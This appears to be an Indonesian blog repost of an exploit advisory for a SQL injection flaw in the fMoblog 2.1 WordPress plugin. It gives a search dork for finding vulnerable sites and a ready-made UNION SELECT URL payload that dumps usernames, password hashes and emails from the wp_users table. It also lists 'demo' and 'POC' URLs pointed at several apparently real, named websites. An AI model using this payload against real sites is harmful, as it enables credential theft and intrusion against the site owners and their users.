Wordpress Plugin fMoblog Remote SQL Injection Vulnerability
undefined
undefined
#############################################################
# Wordpress Plugin fMoblog Remote SQL Injection Vulnerability
# Plugin Home: http://www.fahlstad.se/wp-plugins/fmoblog/
# Plugin Version: 2.1
# Author: strange kevin
# Email: strange.kevin@gmail.com
# Google Dork: "Gallery powered by fMoblog"
##############################################################
# Exploit:
http://www.site.com/?page_id=[valid_id]&id=-999+union+all+select+1,2,3,4,group_concat(user_login,0x3a,user_pass,0x3a,user_email),6+from+wp_users--
# Demo:
http://www.tarynitup.com/?page_id=20&id=-999+union+all+select+1,2,3,4,group_concat(user_login,0x3a,user_pass,0x3a,user_email),6+from+wp_users--
##############################################################
# Greetz: str0ke and milw0rm.com
##############################################################
POC:
http://www.evilredduck.com/?page_id=7&id=-30+union+all+select+1,2,3,4,group_concat%28user_login,0x3a,user_pass,0x3a,user_email%29,6+from+wp_users--
http://www.rantbox.org/?page_id=590&id=-18+union+all+select+1,2,3,4,group_concat%28user_login,0x3a,user_pass,0x3a,user_email%29,6+from+wp_users--
note: sql version 5.x.x
Langganan:
Posting Komentar (Atom)
- Pindahan
- Jangan Menyerah
- Wordpress Plugin fMoblog Remote SQL Injection Vulnerability
- Bugs di perusahaan IT
- injek siqil for dummies
- You are attempting to open a file type that is blocked by your registry policy setting
- [POC] darkMySQLi.py
- addons favorit
- APBook 1.3.0 (Login Bypass) SQL Injection Vulnerability
- [POC] Schemafuzz.py
- Bye bye milw0rm
- [POC] Expert Advisior SQL Injection Vulnerability
- printer ngilang
- software FBI
- Utekbuntu
0 komentar:
Posting Komentar